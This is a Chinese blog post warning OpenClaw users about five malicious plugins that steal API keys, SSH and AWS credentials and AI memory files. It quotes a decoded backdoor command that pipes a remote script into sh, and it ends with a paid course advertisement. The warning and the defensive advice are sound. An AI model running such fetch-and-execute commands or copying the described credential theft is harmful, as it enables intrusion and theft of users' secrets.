紧急避雷!这5个OpenClaw插件正偷你API Key卖钱!
昨晚我的阿里云账单炸了,一晚上跑掉9963万token。
昨天晚上凌晨两点,我被手机震动吵醒。阿里云短信提醒:您的账户已产生欠费。
我的OpenClaw(就是那个叫“龙虾”的AI智能体)一直跑得好好的,每天也就几块钱的Token费用,怎么可能一夜之间烧掉9000多万token?
登录控制台一看,API调用量在凌晨一点突然暴增,短短一个小时内被调用了1.3万次。
今天我必须把这些血泪教训写出来,如果你也在用OpenClaw,请立刻检查你装过的插件。
OpenClaw这玩意儿最近火得一塌糊涂,微信群里到处都在发教程、晒配置。
它能帮你回微信、发邮件、查航班、炒币、写代码,你只要在Telegram或者飞书里吼一嗓子,它就去帮你干活了。
但你知道吗?ClawHub官方插件市场里,10个插件就有1个是恶意插件。
根据国家网络与信息安全信息通报中心的最新数据,在ClawHub的3016个技能插件中,336个包含恶意代码,占比高达10.8%。
这什么概念?你随手装10个插件,大概率就有一个在偷你家底。
更恐怖的是,有近28万个OpenClaw实例暴露在公网上,有些连最基本的身份认证都没开,相当于把你家大门敞开,谁都能进来翻箱倒柜。
下面这5个插件,是我和几个安全圈的朋友连夜排查出来的,看见一个删一个,千万别犹豫。
第一宗罪:advanced-automation —— API Key收割机
这个插件伪装成“高级自动化工具”,号称能让AI执行更复杂的任务序列。下载量一度冲到ClawHub前20。
但实际上,它会在你配置API Key的时候,静默地把Key发送到一个境外IP:91.92.242.30。
安全研究员Paul McCarty在2月份的报告中就点名了这个IP,这是一个已知的C2(命令与控制)服务器,专门收集各种API Key和加密货币钱包私钥。
第二宗罪:smar-workflow-pro —— 你家文件随便看
注意这个名字的拼写,smar不是smart,这是典型的仿冒手法。
这个插件声称能优化工作流,实际上它在后台偷偷读取你的`~/.ssh`目录、`~/.aws`凭证文件,以及浏览器保存的密码。
我一个做运维的朋友,装了这个插件后,公司的服务器私钥被泄露,差点酿成生产事故。
第三宗罪:auto-deploy-helper —— 系统命令后门
这个伪装成“自动部署助手”的插件,会在你执行部署命令时偷偷运行恶意系统指令。
它的代码里嵌入了base64编码的恶意脚本,解码后是`curl http://恶意域名/backdoor.sh | sh`,直接给你的系统开后门。
最骚的是,它还会检查你是不是在安全审计模式下运行,如果是就隐藏行为,等你切回正常模式再发作。
第四宗罪:memory-booster —— 偷走你的AI记忆
OpenClaw有个记忆文件叫`MEMORY.md`,记录了你和AI的所有对话历史、偏好设置、甚至你的一些隐私信息。
这个“memory-booster”插件声称能优化AI的记忆能力,实际上它一上来就读取`MEMORY.md`和`SOUL.md`文件,然后全部外传。
你的AI性格、你的对话记录、你告诉过AI的所有秘密,全都被打包送走了。
第五宗罪:quick-publish —— 公众号乱发文章
它专门针对那些用OpenClaw做自媒体运营的人。它的功能描述是“一键发布到各大平台”,但实际运行时会替换掉你的文章内容,发布垃圾广告甚至违禁内容。
有个做公众号的朋友,凌晨三点被粉丝骂醒,说他的号在发赌博广告。查了半天,就是这个插件在搞鬼。
装,当然要装。OpenClaw的强大就在于它的插件生态,不能因噎废食。
但有一个原则必须记住:装任何插件之前,先用安全审计工具扫一遍。
官方有一个叫 `skill-vetter` 的安全审计技能,这是你第一个要装的插件,没有之一。
# 1. 安装 clawhub(技能管理工具)npm install -g clawhub# 2. 安装 skill‑vetterclawhub install skill‑vetter# 3. 启用自动扫描(推荐)clawhub config set auto‑scan true# 4. 手动审查单个技能clawhub vet <skill‑name># 或审查指定路径/URLclawhub vet https://github.com/xxx/skill‑repo
`skill-vetter`会自动检查这6个维度:
-
来源可信度:作者是谁?下载量多少?什么时候更新的?
-
危险信号:有没有curl/wget访问未知URL?
-
敏感目录:有没有读取~/.ssh、~/.aws这些目录?
-
命令执行:有没有eval()、exec()这些高危函数?
国家互联网应急中心(CNCERT)和工信部都已经发布了OpenClaw的安全风险提示。这不是闹着玩的。
-
不要暴露公网端口:OpenClaw默认绑定0.0.0.0:18789,所有IP都能访问,这等于把家门敞开。改成127.0.0.1,或者加一层反向代理配身份认证。
-
用Docker跑,别裸跑:Docker容器隔离能限制权限。启动时加上`–privileged=false`和`–cap-drop=ALL`,把AI关在笼子里。
-
-
定期体检:每周跑一次 clawhub config set auto‑scan true
-
白名单:只装你确实需要的插件,别贪多。每一个插件都是一个新的攻击面。
现在,立刻,打开你的终端,跑一下`openclaw plugin list`,看看上面这5个插件在不在你的列表里。
如果在,立刻卸载:openclaw plugin uninstall 插件名
很多人可能会觉得,AI不就是生个搞笑视频,做个PPT吗?
AI时代真正的红利,不是你会用AI,而是你让AI替你干活。
就像Sora关停教会我们的道理一样——生态为王,工具只是工具。真正能赚到💰的,不是那些只会炫技的人,而是那些懂得搭建流水线、复用现成生态位的人。
🦞 OpenClaw 出来,老赵7天7夜烧掉10亿token,把“10w+流水线”做成了现成skill!
你还在吭哧吭哧写公众号、熬夜剪视频?老赵直接用 QClaw 肝出两套“自动搞💰”skill——📌 公众号写作skill:每天自动选题+一键发布,干到12万阅读🎬 短视频制作skill:书单视频一键出片,丢到各平台直接开跑
👇下面这个书单视频,就是 QClaw + 书单视频skill 一键生成的,全程没动手。
重点是——这两个skill,老赵花了 10 亿token的“学费”才磨出来,但你不用重新造车轱辘,因为老赵已经把 skill + 所有依赖 打包进了📦 《Openclaw+自媒体课程》
一键复用,一键发公众号,一键生成视频,一键写朋友圈。相当于直接把“高质量内容工作室”塞到你手里,连龙虾都不用自己养。
💰 原💰199,首批学员优惠99直接给最终skill,拿过来就能用,别再自己从零开始烧token了!
🎯 感兴趣直接链接老赵👉 ➕v:aishejilaozhao报出暗号:龙虾,咨询即领《小龙虾使用指南》——先拿攻略,再看值不值,但名额真不等你
夜雨聆风
